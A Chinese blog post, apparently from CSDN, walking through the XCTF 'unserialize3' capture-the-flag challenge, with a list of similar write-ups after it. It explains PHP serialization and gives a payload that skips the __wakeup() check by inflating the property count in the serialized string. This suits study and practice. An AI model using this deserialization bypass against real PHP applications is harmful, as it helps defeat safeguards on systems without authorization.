125,【1】攻防世界unserialize3

于 2025-02-10 18:55:24 发布
阅读量642 收藏 4
点赞数 13
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2402_87039650/article/details/145552528
版权

 

进入靶场

 

代码

<?php
// 定义一个名为 xctf 的类
class xctf {
    // 定义一个公共属性 $flag,初始值为字符串 '111'
    public $flag = '111';

    // 定义 __wakeup() 魔术方法
    // 当使用 unserialize() 函数反序列化对象时,会自动调用 __wakeup() 方法
    // 在这个方法中,使用 exit('bad requests'); 语句直接终止脚本执行并输出 'bad requests'
    public function __wakeup() {
        exit('bad requests');
    }
}
?>

并提示我们通过?code提交

代码表明会进行反序列化,所以我们要进行序列化,但不能调用_wakeup()方法

原理(本题主要知识点):在反序列化过程中,会根据属性个数的情况来决定是否调用 __wakeup() 方法。

现在我们进行序列化

注意:在 PHP 里,当使用 serialize() 函数对一个对象进行操作时,序列化的是整个对象实例,这包含了对象的所有属性以及类的定义信息 ,所以就这个题而言,我们序列化的不只是 flag 属性的值,我们要序列化它给出来的所有代码,整个 xctf类

也就是说只需要在题目给出的代码中加三句用于实现序列化的语句并输出即可,语句中调用serialize()函数,整和后如下

<?php
class xctf {
    public $flag = '111';
    public function __wakeup() {
        exit('bad requests');
    }
}

$obj = new xctf();
$serialized = serialize($obj);
echo $serialized;
?>

运行结果

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

 此时我们需要修改属性个数,就需要了解这串序列化字符串中的各个部分代表什么,如下

  • O 表示这是一个对象(Object)。
  • 4 代表类名 xctf 的长度。
  • 1 表示对象的属性个数。
  • s:4:"flag";s:3:"111"; 说明有一个名为 flag 的字符串(s 表示字符串)属性,其值为长度为 3 的字符串 "111"

修改1,改为比一大的数字即可

 我改为6了,各位随意

O:4:"xctf":6:{s:4:"flag";s:3:"111";}

最后通过get方式传参,传给code 

 

得到flag 

 

rzydal
关注
攻防世界: WEB——unserialize3
Zeker62的博客
08-23 396
靶场内容 题目:反序列化——说明和反序列化有关 打开靶场:PHP代码——PHP反序列化 solution 这个靶场出来之后,显示出来是一个不完整的PHP代码——括号都没有完全闭合 开始分析: __wakeup()属于魔术方法,通常用于反序列化中。 unserialize() 反序列化函数会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对...
攻防世界_unserialize3(反序列化)
2401_87524087的博客
02-10 587
反序列化漏洞是指在计算机程序中,当对序列化数据进行反序列化操作时,由于程序没有对输入的序列化数据进行充分的验证和过滤,导致攻击者可以构造恶意的序列化数据,从而在目标系统上执行任意代码、获取敏感信息或进行其他恶意操作的安全漏洞。
攻防世界unserialize3
qq_44111753的博客
11-17 280
题目: WP: 新知识: serialize:序列化函数,将对象转化为可保存可传输的字符串 unserialize:反序列化,将字符串转为原来的对象 <?php $a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut'); //序列化数组 $s = serialize($a); echo $s; //输出结果:a:3:{s:1:"a";s:5:"Apple";s:1:"b";s:6:"banana";s:1:"c"
攻防世界-unserialize3
weixin_62608816的博客
07-13 1072
这是一个利用反序列字符串来进行绕过的题,根据提示我们要构造code参数,但是需要绕过wakeup函数查找资料得知wakeup为魔法函数,在进行unserialize反序列化的时候,首先就要查看有无该函数有的话 就会先执行他:绕过: 通过测试发现可以通过增加对象的属性个数来进行绕过,根据源码编辑php脚本输出序列化字符串: ​ 将对象属性由1变为2得到** 由此可以构造payload 拿到flag:...
攻防世界unserialize3
m0_73303597的博客
11-06 2235
好难啊
攻防世界unserialize3
m0_74979597的博客
07-12 2949
序列化和反序列化是将数据结构或对象转换为可存储或传输的格式,以便在需要时可以重新创建它们的过程。序列化将数据结构或对象转换为字节流或字符串,而反序列化将字节流或字符串转换回原始数据结构或对象。在计算机科学中,序列化和反序列化是非常重要的概念,因为它们允许我们在不同的应用程序之间共享数据。例如,当我们将数据从一个应用程序发送到另一个应用程序时,我们需要将数据序列化为可传输的格式,然后在另一个应用程序中反序列化它以将其还原为原始数据结构或对象。
攻防世界-Web进阶篇-005unserialize3
gyy990526的博客
03-14 2892
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界 unserialize3
08-16
攻防世界中,unserialize3 可能是指 PHP 序列化和反序列化的第三个版本。序化是将对象转换为字节流过程,而反序列化则是将字节流转换回对象的过程。这些功能在 PHP 中通过 serialize() 和 unserialize() 函数实现...
攻防世界unserialize
最新发布
03-09
1. **白名单过滤**:仅限于接受已知类型的对象进行反序列化,拒绝任何未知类型。 2. **自定义反序列化器**:编写自己的解析算法代替默认版本,严格控制每一步骤以排除非法指令集的存在可能性。 3. **禁用敏感功能...
攻防世界(WEB) unserialize3
qq_54929891的博客
10-09 249
先来记录一下serialize序列化函数和unserialize反序列化函数的知识点
攻防世界Web-unserialize3
05-14 389
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。 payload: ?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";} 转载于:https://www.cnblogs.com/JKding233/p/108642...
攻防世界-web unserialize3
m0_48108919的博客
02-11 788
结尾提示?code= 猜测通过code传入参数 __wakeup()是魔术方法,经常用在反序列化操作中,unserialize()会检查是否存在一个__wakeup()方法。如果存在,则会先调用__wakeup方法,预先准备对象需要的资源。 由题目代码可知只要触发了wakeup()方法就会执行exit()结束程序 根据题目描述这是一道反序列化题,猜测操作查看flag的代码在xctf类中并且隐藏了没显示在前台,我们需要利用反序列化来调用xctf类,同时需要绕过wakeup()方法 P...
攻防世界-web】unserialize3
weixin_73625393的博客
10-27 862
unserialize()反序列化函数会检查是否存在一个_wakeup()方法。//输出被序列化的对象(a)public function __wakeup(){ //定义公有的类的方法_wakeup()题目中的代码目前没有看见序列化函数,因此传递参数需要自己传递已经序列化的参数,题目中已经提示,传参到code。O::“”::{S:…根据代码审计,构造出来序列化序列后,不能给_wakeup()执行,否则会返回bad request。
攻防世界(WEB)——unserialize3
NanGuai的博客
09-19 682
与大部分面向对象的语言类似,PHP在使用完一个对象后会将其销毁。当下某个页面要使用同一个对象时,为了避免出现找不到该对象的窘况,需要有一种方法能够将对象保存下来。以下是题目中给出的PHP代码,可以看到代码有缺失。此外,代码中还提示了我们有可能需要将已经序列化的参数传递给code变量。执行,需要使反序列失败。因此需要在不更改序列化值格式的前提下对其作出修改,然后传给。因为没有给出描述,但是根据题目可以看出来这道与。我们尝试将它补全并打印出对象的序列化值。这里我们先搞清楚什么是反序列化。
攻防世界web---unserialize3
m0_72447684的博客
10-10 308
攻防世界web---unserialize3
攻防世界——web——unserialize3(反序列化)
m0_75007575的博客
04-05 1760
一、序列化 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将对象转化为字节序列的过程 二、反序列 把字节序列恢复为对象的过程称为对象反序列
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值